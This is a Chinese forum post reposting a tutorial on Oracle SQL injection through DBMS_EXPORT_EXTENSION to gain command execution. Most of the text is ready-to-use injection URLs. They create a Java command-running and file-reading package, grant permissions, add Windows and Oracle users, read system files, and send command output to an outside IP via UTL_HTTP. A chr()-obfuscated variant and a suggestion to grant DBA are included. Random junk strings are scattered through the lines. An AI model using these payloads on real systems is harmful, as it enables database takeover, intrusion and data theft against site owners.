找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2302|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 + t# T. W* K6 F) q. E" ~( e8 _7 `' z

: j0 l3 y6 j- R, C( u) I  f1 R1 d  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 6 \* n; D, @( _! ?
的形式即可。(用" 'a'|| "是为了让语句返回true值) $ L5 c. n% m  t4 I) G. b7 [
语句有点长,可能要用post提交。 7 T8 [0 G% U3 {  \# C# ?3 u$ J- j
以下是各个步骤: 0 U) c9 p6 j* c" Z
1.创建包
* `- `* G; A8 f通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
- y9 f. h& y' N: a+ u& p( L9 d/xxx.jsp?id=1 and '1'<>'a'||( : ^( H  ]1 r% U5 V
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& p% n: a# |! G
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(# b9 J' t4 H7 `: @; f
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
; Y, B& P% x& P}'''';END;'';END;--','SYS',0,'1',0) from dual , y/ n" H, g4 G4 [$ R5 F
)
% g* [/ t8 l# x& R------------------------
9 j1 t! `$ n; p$ y6 |) ?如果url有长度限制,可以把readFile()函数块去掉,即:
. W, M% B0 H7 B* Q/ r/xxx.jsp?id=1 and '1'<>'a'||( . G1 Z. O# R" o' M
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 a$ P5 z6 ?0 ~' @; G" u4 q% Screate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(& B3 b, t2 {9 x9 x2 [; b. x/ n
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}- L; Q0 w) q" ~; @
}'''';END;'';END;--','SYS',0,'1',0) from dual
- [' u8 X8 T- L)
% U2 B; W8 I! P7 c: g( o同时把后面步骤 提到的 对readFile()的处理语句去掉。
* O, v( u: o3 @1 q- M' ?7 \8 y------------------------------ ( b9 q4 G7 ^5 V9 Q( O
2.赋Java权限 2 ^0 |2 J* d' x. L# y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
( A7 G9 }' }. Y  [/ p4 v3.创建函数
( }8 O& t5 P/ x: H$ Z; ^- h; Cselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''') i5 ?( T- l7 {) Q0 Y& W$ ?0 A$ h- p
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
1 j( T  [$ @8 ~! o+ C/ ^select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 i  T, H" q5 T4 t- ccreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual1 n$ R- t: _% ^# x
4.赋public执行函数的权限   Q8 z7 b# t! o& X
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
4 G- O+ K  ]: \0 l6 Y! Yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
: P9 N  Q/ ~' T- G- C+ n& f5.测试上面的几步是否成功 $ [- t$ j; j+ C- g$ {! g
and '1'<>'11'||( - s0 `, R) L2 q9 `
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' / F5 F) s& V  p
) : W5 `1 x) l4 T- l
and '1'<>( * H; Y5 {. w3 T! I4 H# k
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
* q  n6 }  T) I$ G5 `)
0 R* k2 T# U  n6.执行命令:
2 h% e1 S9 k) n* ^" O3 V/xxx.jsp?id=1 and '1'<>( 8 z" g7 C' R& {6 ?
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual ' ^4 g) h$ X. S( j5 V2 S0 j: H7 o

: {5 N( _  _/ w: i)
! j  O! Q) k, k, Z1 m/xxx.jsp?id=1 and '1'<>( & W) b7 ~- {: T9 t* t, a1 ~9 o
select  sys.LinxReadFile('c:/boot.ini') from dual" |2 Y, q' q% u7 i/ w& |

' }0 E* }4 r/ m)0 X2 y2 R' r: `# E1 N
  % b5 e! |; ~' H  T# c: t
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 ; t  J( i+ S* w4 y. j
如果要查看运行结果可以用 union :
0 d+ c2 M: n  z4 `/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
4 X$ Q0 I. H3 M& k- T% x或者UTL_HTTP.request(:
' E* c2 r6 Z" j/xxx.jsp?id=1 and '1'<>( . h+ _. G0 X7 a& Y; L! E; g  r4 O
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual3 e; k# O4 v6 E4 H; r  R
) " f4 F5 ?1 X% F8 l
/xxx.jsp?id=1 and '1'<>( - S3 w6 d6 y: G. k
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual. K. g2 v: }4 e0 P2 K7 Q
) 6 w: G1 l! l" b& P' i
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
1 s: E* _% i  U! `7 j/ ^* Q--------------------
# ]; {2 F% X1 W. |, ^  r. A6.内部变化
  Z5 o6 `6 Y# \9 v  p% Z通过以下命令可以查看all_objects表达改变:
. {$ `* W( T+ B: I6 M; ^select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'  v: `5 {' h; O) O9 Z* g
7.删除我们创建的函数
) a: ?  l* {2 ]+ p5 y1 fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ \2 u4 t" V. y( A! Fdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual 1 f  z% V* m" X6 U
====================================================
5 X# R: X3 y5 h全文结束。谨以此文赠与我的朋友。 0 m4 t9 h" p/ }' j6 r( F
linx
# [- j; b, r+ W! \9 I124829445 & f4 h0 t) {# q5 \. t/ S$ \2 h9 V  y
2008.1.12 1 \! l- H* h0 ^# Y
linyujian@bjfu.edu.cn 5 p1 o  N  V/ W# {$ D, _. c
====================================================================== $ i& ^% Z! ?. I4 L
测试漏洞的另一方法: . u$ w5 F8 g7 `6 r' I5 g' |
创建oracle帐号: % i  L- ?9 ^; s" b; q; \: C
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''" l+ z* x2 {3 y4 |
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
2 r# S5 u/ X* y  B# X, W! r) c即:
# Z' @5 ?* N6 c1 kselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
% C3 t3 j0 `" }chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual 9 N% M6 w" q/ z# `* w
确定漏洞存在: ! o  b8 a+ |2 t% B" l+ U% K
1<>(
/ d7 ?6 l) a# e  Dselect user_id from all_users where username='LINXSQL'
+ N$ i8 D" ^1 _5 W) ^7 K# D2 Y# a)
3 y: j6 Z, R5 F2 J/ W. G: r- ~给linxsql连接权限:
/ R, i4 K& B  s4 p0 \) `select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, z) x6 q  L* r# u8 c) FGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
2 o6 [) S0 T( A$ \; y+ u删除帐号: . l/ e- Q6 a% f$ Y& \
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
! L* q! `& a" W1 W: `drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
; U8 G: d" F1 w/ w3 L' N====================== , E. z: H4 D) T$ |5 c6 u
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:$ A6 D( ?% C- L' N7 Y
1.jsp?id=1 and '1'<>( ; Q, T& S8 G! u# [1 z: R
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 e) X( Q) b. z0 ?
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual; p: l. _8 k& s9 a
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
" M7 M' @& `% E+ G% z" [ )
  _. }* W, @) l8 ~4 K4 A
6 ?6 H' \+ D' O$ }  p1 J3 u( f+ F6 A* M9 c) c( k0 d

& `5 z6 B- t, v4 n6 W# K; J1 n8 ^9 i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表